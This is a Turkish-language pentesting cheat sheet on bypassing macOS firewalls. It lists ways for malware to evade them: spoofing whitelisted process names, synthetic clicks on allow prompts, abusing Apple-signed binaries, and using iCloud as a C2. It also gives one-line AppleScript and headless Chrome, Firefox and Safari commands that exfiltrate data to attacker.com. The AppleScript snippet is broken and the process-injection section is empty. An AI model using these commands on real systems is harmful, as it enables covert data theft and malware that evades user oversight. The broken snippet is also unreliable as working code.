macOS Bypassing Firewalls

Bulunan teknikler

Aşağıdaki teknikler bazı macOS güvenlik duvarı uygulamalarında çalışır durumda bulundu.

Beyaz liste isimlerini kötüye kullanma

• Örneğin, kötü amaçlı yazılımı launchd gibi iyi bilinen macOS süreçlerinin isimleriyle çağırmak.

Sentetik Tıklama

• Güvenlik duvarı kullanıcıdan izin istiyorsa, kötü amaçlı yazılımın izin ver butonuna tıklamasını sağlamak.

Apple imzalı ikilileri kullanma

• curl gibi, ama ayrıca whois gibi diğerleri de.

İyi bilinen apple alanları

Güvenlik duvarı, apple.com veya icloud.com gibi iyi bilinen apple alanlarına bağlantılara izin veriyor olabilir. Ve iCloud, bir C2 olarak kullanılabilir.

Genel Bypass

Güvenlik duvarlarını aşmayı denemek için bazı fikirler.

İzin verilen trafiği kontrol etme

İzin verilen trafiği bilmek, potansiyel olarak beyaz listeye alınmış alanları veya hangi uygulamaların onlara erişmesine izin verildiğini belirlemenize yardımcı olacaktır.

lsof -i TCP -sTCP:ESTABLISHED

DNS İstismar Etme

DNS çözümlemeleri, muhtemelen DNS sunucularıyla iletişim kurmasına izin verilecek olan mdnsreponder imzalı uygulama aracılığıyla gerçekleştirilir.

Tarayıcı Uygulamaları Aracılığıyla

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Süreç enjeksiyonları aracılığıyla

Eğer herhangi bir sunucuya bağlanmasına izin verilen bir süreç içine kod enjekte edebilirseniz, güvenlik duvarı korumalarını aşabilirsiniz:

Referanslar

• https://www.youtube.com/watch?v=UlT5KFTMn2k